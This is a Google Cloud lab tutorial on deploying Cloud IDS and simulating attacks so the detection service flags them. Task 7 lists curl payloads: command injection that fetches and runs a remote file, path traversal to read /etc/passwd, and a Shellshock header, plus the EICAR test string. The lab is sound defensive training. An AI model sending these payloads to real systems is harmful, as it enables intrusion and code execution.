arrow_back

Getting Started with Cloud IDS

Sign in Join
Quick tip: Review the prerequisites before you run the lab
Use an Incognito or private browser window to run this lab. This prevents any conflicts between your personal account and the student account, which may cause extra charges incurred to your personal account.
Test and share your knowledge with our community!
done
Get access to over 700 hands-on labs, skill badges, and courses

Getting Started with Cloud IDS

Lab 1 hour 15 minutes universal_currency_alt 5 Credits show_chart Introductory
info This lab may incorporate AI tools to support your learning.
Test and share your knowledge with our community!
done
Get access to over 700 hands-on labs, skill badges, and courses

Overview

In this lab, you deploy Cloud Intrusion Detection System (Cloud IDS), a next-generation advanced intrusion detection service that provides threat detection for intrusions, malware, spyware, and command-and-control attacks. You simulate multiple attacks and view the threat details in the Google Cloud console.

Cloud IDS Infrastructure Diagram

Objectives

In this lab, you learn how to perform the following tasks:

  • Build out a Google Cloud networking environment as shown in the previous diagram.
  • Create a Cloud IDS endpoint.
  • Create two virtual machines using gcloud CLI commands.
  • Create a Cloud IDS packet mirroring policy.
  • Simulate attack traffic from a virtual machine.
  • View threat details in the Cloud console and Cloud Logging.

Setup

For each lab, you get a new Google Cloud project and set of resources for a fixed time at no cost.

  1. Click the Start Lab button. If you need to pay for the lab, a pop-up opens for you to select your payment method. On the left is the Lab Details panel with the following:

    • The Open Google Cloud console button
    • Time remaining
    • The temporary credentials that you must use for this lab
    • Other information, if needed, to step through this lab

  2. Click Open Google Cloud console (or right-click and select Open Link in Incognito Window if you are running the Chrome browser).

    The lab spins up resources, and then opens another tab that shows the Sign in page.

    Tip: Arrange the tabs in separate windows, side-by-side.

    Note: If you see the Choose an account dialog, click Use Another Account.

  3. If necessary, copy the Username below and paste it into the Sign in dialog.

    {{{user_0.username | "Username"}}}

    You can also find the Username in the Lab Details panel.

  4. Click Next.

  5. Copy the Password below and paste it into the Welcome dialog.

    {{{user_0.password | "Password"}}}

    You can also find the Password in the Lab Details panel.

  6. Click Next.

    Important: You must use the credentials the lab provides you. Do not use your Google Cloud account credentials. Note: Using your own Google Cloud account for this lab may incur extra charges.

  7. Click through the subsequent pages:

    • Accept the terms and conditions.
    • Do not add recovery options or two-factor authentication (because this is a temporary account).
    • Do not sign up for free trials.

After a few moments, the Google Cloud console opens in this tab.

Note: To view a menu with a list of Google Cloud products and services, click the Navigation menu at the top-left, or type the service or product name in the Search field. Navigation menu icon

Activate Google Cloud Shell

Google Cloud Shell is a virtual machine that is loaded with development tools. It offers a persistent 5GB home directory and runs on the Google Cloud.

Google Cloud Shell provides command-line access to your Google Cloud resources.

  1. In Cloud console, on the top right toolbar, click the Open Cloud Shell button.

    Highlighted Cloud Shell icon

  2. Click Continue.

It takes a few moments to provision and connect to the environment. When you are connected, you are already authenticated, and the project is set to your PROJECT_ID. For example:

Project ID highlighted in the Cloud Shell Terminal

gcloud is the command-line tool for Google Cloud. It comes pre-installed on Cloud Shell and supports tab-completion.

  • You can list the active account name with this command:
gcloud auth list

Output:

Credentialed accounts: - @.com (active)

Example output:

Credentialed accounts: - google1623327_student@qwiklabs.net
  • You can list the project ID with this command:
gcloud config list project

Output:

[core] project =

Example output:

[core] project = qwiklabs-gcp-44776a13dea667a6 Note: Full documentation of gcloud is available in the gcloud CLI overview guide .

This lab will all be done using gcloud CLI commands inside Cloud Shell.

Task 1. Enable APIs

In this task you set the project ID variable and then enable the APIs required for the lab.

  1. In Cloud Shell, to set the Project_ID environment variable, run the following command:
export PROJECT_ID=$(gcloud config get-value project | sed '2d')
  1. Enable the Service Networking API:
gcloud services enable servicenetworking.googleapis.com \ --project=$PROJECT_ID

If prompted to authorize the command, click Authorize.

  1. Enable the Cloud IDS API:
gcloud services enable ids.googleapis.com \ --project=$PROJECT_ID
  1. Enable the Cloud Logging API:
gcloud services enable logging.googleapis.com \ --project=$PROJECT_ID

Click Check my progress to verify the objective. Enable APIs.

Task 2. Build the Google Cloud networking footprint

In this task, you create a Google Cloud VPC network and configure private services access.

Private services access is a private connection between your VPC network and a network owned by Google or a third party. Google or the third party, entities who are offering services, are also known as service producers.

The private connection enables virtual machine (VM) instances in your VPC network and the services that you access to communicate exclusively by using internal IP addresses.

  1. In Cloud Shell, to create a VPC, run the following command:
gcloud compute networks create cloud-ids \ --subnet-mode=custom

If prompted to authorize the command, click Authorize.

  1. Add a subnet to the VPC for mirrored traffic in us-east1:
gcloud compute networks subnets create cloud-ids-useast1 \ --range=192.168.10.0/24 \ --network=cloud-ids \ --region=us-east1
  1. Configure private services access:
gcloud compute addresses create cloud-ids-ips \ --global \ --purpose=VPC_PEERING \ --addresses=10.10.10.0 \ --prefix-length=24 \ --description="Cloud IDS Range" \ --network=cloud-ids
  1. Create a private connection:
gcloud services vpc-peerings connect \ --service=servicenetworking.googleapis.com \ --ranges=cloud-ids-ips \ --network=cloud-ids \ --project=$PROJECT_ID

Click Check my progress to verify the objective. Create a VPC.

Task 3. Create a Cloud IDS endpoint

In this task you create a Cloud IDS endpoint in us-east1 with a severity set to informational.

Cloud IDS uses a resource known as an IDS endpoint, a zonal resource that can inspect traffic from any zone in its region. Each IDS endpoint receives mirrored traffic and performs threat detection analysis.

Note: The creation of the IDS endpoint takes approximately 20 minutes.
  1. To create a Cloud IDS endpoint, in Cloud Shell, run the following command:
gcloud ids endpoints create cloud-ids-east1 \ --network=cloud-ids \ --zone=us-east1-b \ --severity=INFORMATIONAL \ --async
  1. Verify that the Cloud IDS endpoint is initiated:
gcloud ids endpoints list --project=$PROJECT_ID

If the message Would you like to enable and retry appears, press Y.

The output should be similar to this:

ID: cloud-ids-east1 LOCATION: us-east1-b SEVERITY: INFORMATIONAL STATE: CREATING NETWORK: cloud-ids TRAFFIC_LOGS:

Click Check my progress to verify the objective. Create a Cloud IDS endpoint.

Task 4. Create Firewall rules and Cloud NAT

In this task you create two firewall rules: allow-http-icmp and allow-iap-proxy.

To enable standard http port (TCP 80) connections, and ICMP protocol connections to the server VM from all sources in the cloud-ids network, you define the allow-http-icmp rule.

To enable SSH connections to the VMs from the Identity-Aware Proxy IP range, you define the allow-iap-proxy_ rule.

You also configure Cloud Router and then configure Cloud NAT. As a prerequisite for Cloud NAT, a Cloud Router must first be configured in the same region. To provide internet access to VMs that don't have a public IP address, a Cloud NAT must be created in the same region. The VMs will be created without a public IP address to make sure that they are inaccessible from the internet. However, they will need access to the internet to download updates and files.

  1. To create the allow-http-icmp rule, in Cloud Shell, run the following command:
gcloud compute firewall-rules create allow-http-icmp \ --direction=INGRESS \ --priority=1000 \ --network=cloud-ids \ --action=ALLOW \ --rules=tcp:80,icmp \ --source-ranges=0.0.0.0/0 \ --target-tags=server
  1. Create the allow-iap-proxy rule:
gcloud compute firewall-rules create allow-iap-proxy \ --direction=INGRESS \ --priority=1000 \ --network=cloud-ids \ --action=ALLOW \ --rules=tcp:22 \ --source-ranges=35.235.240.0/20

Click Check my progress to verify the objective. Add firewall rules to the VPC.

  1. To create a Cloud Router, run the following command:
gcloud compute routers create cr-cloud-ids-useast1 \ --region=us-east1 \ --network=cloud-ids
  1. To configure a Cloud NAT, run the following command:
gcloud compute routers nats create nat-cloud-ids-useast1 \ --router=cr-cloud-ids-useast1 \ --router-region=us-east1 \ --auto-allocate-nat-external-ips \ --nat-all-subnet-ip-ranges

Click Check my progress to verify the objective. Create a Cloud Router.

Task 5. Create two virtual machines

In this task, you create two virtual machines (VMs). The first virtual machine is your web server, which is mirroring to Cloud IDS. The second virtual machine is the source of your attack traffic.

You establish an SSH connection to your server via Identity-Aware Proxy (IAP), check the status of your web service server, create a benign malware file on the web server, and then add content to the file.

  1. To create a virtual machine to be a server mirroring to Cloud IDS, in Cloud Shell, run the following command:
gcloud compute instances create server \ --zone=us-east1-b \ --machine-type=e2-medium \ --subnet=cloud-ids-useast1 \ --no-address \ --private-network-ip=192.168.10.20 \ --metadata=startup-script=\#\!\ /bin/bash$'\n'sudo\ apt-get\ update$'\n'sudo\ apt-get\ -qq\ -y\ install\ nginx \ --tags=server \ --image=debian-11-bullseye-v20240709 \ --image-project=debian-cloud \ --boot-disk-size=10GB

This command creates a Debian server in us-east1 and installs a simple web service.

  1. Create a virtual machine to be a client sending attack traffic:
gcloud compute instances create attacker \ --zone=us-east1-b \ --machine-type=e2-medium \ --subnet=cloud-ids-useast1 \ --no-address \ --private-network-ip=192.168.10.10 \ --image=debian-11-bullseye-v20240709 \ --image-project=debian-cloud \ --boot-disk-size=10GB

This command prepares a Debian server in us-east1 to use as your client.

Click Check my progress to verify the objective. Create a virtual machine.

Prepare your server

In this procedure, you validate your server and then create a benign malware payload for your client.

  1. To establish an SSH connection to your server via IAP, run the following command:
gcloud compute ssh server --zone=us-east1-b --tunnel-through-iap

This command will prompt you through a series of steps to create an ssh key and the required directories.

  1. To agree to the directory creation prompt, type Y.

  2. When prompted for a passphrase, to use a blank passphrase, press ENTER twice.

You are now in the shell of your server VM.

Confirm that the web service is running

In this procedure, you check the status of your web service server. You create a benign malware file on the web server and then add content to the file.

  1. To check the status of your web service, run the following Linux command:
sudo systemctl status nginx

The output should be similar to this:

● nginx.service - A high performance web server and a reverse proxy server Loaded: loaded (/lib/systemd/system/nginx.service; enabled; vendor preset: enabled) Active: active (running) since Tue 2021-05-25 18:01:49 UTC; 5h 24 min ago Docs: man:nginx(8) Main PID: 1347 (nginx) Tasks: 3 (limit: 4665) Memory: 4.5M CGroup: /system.slice/nginx.service ├─1347 nginx: master process /usr/sbin/nginx -g daemon on; master_process on; ├─1348 nginx: worker process └─1349 nginx: worker process May 25 18:01:49 server systemd[1]: Starting A high performance web server and a reverse proxy server... May 25 18:01:49 server systemd[1]: Started A high performance web server and a reverse proxy server.
  1. Change directory to the web service:
cd /var/www/html/
  1. Create a benign malware file on the web server. Run the following Linux command to create a text file:
sudo touch eicar.file
  1. Add the following content to the newly created file:
echo 'X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*' | sudo tee eicar.file
  1. Exit the server VM shell and return to Cloud Shell:
exit

Task 6. Create a Cloud IDS packet mirroring policy

In this task, you create a Cloud IDS packet mirroring policy. This policy determines what traffic is mirrored to the Cloud IDS. You will then attach this policy to the newly created Cloud IDS endpoint.

As mentioned earlier, the Cloud IDS endpoint creation takes some time. Before you can proceed with this lab, the endpoint must be in an active/ready state.

1.To verify that your Cloud IDS endpoint is active, in Cloud Shell, run the following command to show the current state of the Cloud IDS endpoint:

gcloud ids endpoints list --project=$PROJECT_ID | grep STATE

The output should be similar to this:

STATE: READY

Continue to run this command every few minutes until the state shows READY.

  1. Identify the Cloud IDS endpoint forwarding rule and confirm that the Cloud IDS endpoint state is READY:
export FORWARDING_RULE=$(gcloud ids endpoints describe cloud-ids-east1 --zone=us-east1-b --format="value(endpointForwardingRule)") echo $FORWARDING_RULE

The output should be similar to this:

https://www.googleapis.com/compute/v1/projects/md975a7fa0a53145dp-tp/regions/us-east1/forwardingRules/ids-fr-cloud--xkkerutlagop6opm

  1. Create and attach the packet mirroring policy:
gcloud compute packet-mirrorings create cloud-ids-packet-mirroring \ --region=us-east1 \ --collector-ilb=$FORWARDING_RULE \ --network=cloud-ids \ --mirrored-subnets=cloud-ids-useast1

Click Check my progress to verify the objective. Create and attach the packet mirroring policy.

  1. Verify that the packet mirroring policy is created:
gcloud compute packet-mirrorings list

This gcloud command lists the packet mirroring policies and shows whether they are enabled/disabled.

The output should be similar to this:

NAME: cloud-ids-packet-mirroring REGION: us-east1 NETWORK: cloud-ids ENABLE: TRUE

Task 7. Simulate attack traffic

In this task, you establish an SSH connection to your attacked virtual machine and simulate attack traffic from a virtual machine to your server. You do this by running a selection of curl commands that range from low severity to critical severity.

  1. To establish an SSH connection to your attacker virtual machine through IAP, in Cloud Shell, run the following command:
gcloud compute ssh attacker --zone=us-east1-b --tunnel-through-iap Note: You are now in the shell of your attacker VM and not the Cloud Shell machine.
  1. Run the following curl requests in sequence to simulate low, medium, high, and critical severity alerts on the IDS:

Low Severity:

curl "http://192.168.10.20/weblogin.cgi?username=admin';cd /tmp;wget http://123.123.123.123/evil;sh evil;rm evil"

Medium Severity:

curl http://192.168.10.20/?item=../../../../WINNT/win.ini curl http://192.168.10.20/eicar.file

High Severity:

curl http://192.168.10.20/cgi-bin/../../../..//bin/cat%20/etc/passwd

Critical Severity:

curl -H 'User-Agent: () { :; }; 123.123.123.123:9999' http://192.168.10.20/cgi-bin/test-critical
  1. Exit the attacker virtual machine shell and return to Cloud Shell:
exit

Task 8. Review threats detected by Cloud IDS

In this task, you review the various attack traffic captured by the Cloud IDS in the Cloud console. The captured attack traffic profiles provide details of each threat.

  1. In the Google Cloud console, in the Navigation menu (Navigation menu), click Network Security > Cloud IDS.

  2. Click the Threats tab.

The Cloud IDS captured various attack traffic profiles and provided the details on each threat. You may need to click Refresh if you do not see any threats. You now dive a little deeper and view threat details.

  1. Locate the Bash Remote Code Execution Vulnerability threat, click More (More Button), and then select View threat details.
Note: You may have noticed that there are multiple threats that produce the same name, for example, “Bash Remote Code Execution Vulnerability”. This is expected behavior.

If you look closely, you will see that the session IDs of the threats are different. Since both VMs created are in the same subnet, we are seeing mirrored packets for both the client and server. Outbound packets from the client are being mirrored to IDS, and additionally, inbound packets to the server are being mirrored to IDS.

  1. Now you view the details of this incident in Cloud Logging. To return to the Threats page, click the left arrow.

  2. Click the Threats tab.

  3. Locate the Bash Remote Code Execution Vulnerability, click More, and then select View threat logs.

A new Cloud Logging tab opens that displays the same details. This enables you to send the logs to Cloud Storage, Chronicle, or any SIEM/SOAR. You can also create custom workflows to take remediation action based on alerts, like creating a Cloud Function that triggers on an alert and creating or updating a firewall rule to block the IP address, or creating or updating a Google Cloud Armor policy.

Click Check my progress to verify the objective. Getting Started with Cloud IDS.

Congratulations!

In this lab, you did the following:

  1. Created a new VPC and deployed a Cloud IDS endpoint.

  2. Deployed two VMs, created a packet mirroring policy, and then sent attack traffic.

  3. Verified that the Cloud IDS captured the threats by viewing the threat details in the Cloud console and the threat logs in Cloud Logging.

More resources

Try out these labs to get more Cloud IDS experience:

End your lab

When you have completed your lab, click End Lab. Google Cloud Skills Boost removes the resources you’ve used and cleans the account for you.

You will be given an opportunity to rate the lab experience. Select the applicable number of stars, type a comment, and then click Submit.

The number of stars indicates the following:

  • 1 star = Very dissatisfied
  • 2 stars = Dissatisfied
  • 3 stars = Neutral
  • 4 stars = Satisfied
  • 5 stars = Very satisfied

You can close the dialog box if you don't want to provide feedback.

For feedback, suggestions, or corrections, please use the Support tab.

Copyright 2022 Google LLC All rights reserved. Google and the Google logo are trademarks of Google LLC. All other company and product names may be trademarks of the respective companies with which they are associated.

Before you begin

  1. Labs create a Google Cloud project and resources for a fixed time
  2. Labs have a time limit and no pause feature. If you end the lab, you'll have to restart from the beginning.
  3. On the top left of your screen, click Start lab to begin

This content is not currently available

We will notify you via email when it becomes available

Great!

We will contact you via email if it becomes available

One lab at a time

Confirm to end all existing labs and start this one

Use private browsing to run the lab

Use an Incognito or private browser window to run this lab. This prevents any conflicts between your personal account and the Student account, which may cause extra charges incurred to your personal account.